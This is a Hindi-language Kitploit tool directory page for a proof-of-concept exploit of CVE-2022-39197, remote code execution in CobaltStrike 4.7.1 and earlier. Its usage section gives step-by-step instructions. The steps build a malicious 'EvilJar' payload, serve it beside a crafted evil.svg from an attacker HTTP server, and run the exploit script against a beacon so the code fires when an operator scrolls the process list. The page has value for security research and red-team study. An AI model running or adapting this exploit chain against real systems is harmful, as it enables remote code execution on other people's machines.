Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-39197 — CobaltStrike <= 4.7.1 में RCE | Kitploit
उपकरण/GitHubGitHub/its-arun/cve-2022-39197
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubits-arun/cve-2022-39197

CVE-2022-39197

CobaltStrike <= 4.7.1 में RCE

रिपॉजिटरी देखें
387753 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-39197 RCE POC

उपयोग

  • पेलोड तैयार करें
  1. EvilJar/src/main/java/Exploit.java में अपने पेलोड के साथ Line 19 को संपादित करें
  2. jar का उपयोग करके बिल्ड करें: mvn clean compile assembly:single
  3. EvilJar-1.0-jar-with-dependencies.jar को EvilJar/target/ से serve/ फ़ोल्डर में ले जाएँ
  4. serve\evil.svg को संपादित करें और [attacker] को बदलें
  5. python3 -m http.server 8080 का उपयोग करके सर्व करें
  • एक्सप्लॉइट निष्पादित करें
root@kitploit:~
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

जैसे ही उपयोगकर्ता प्रोसेस सूची में स्क्रॉल करता है, पेलोड ट्रिगर हो जाएगा

POC.JPG?

1.jpg

संदर्भ लिंक

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — इस कमजोरी का एक शानदार गहन विश्लेषण है https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

टूल डाउनलोड करें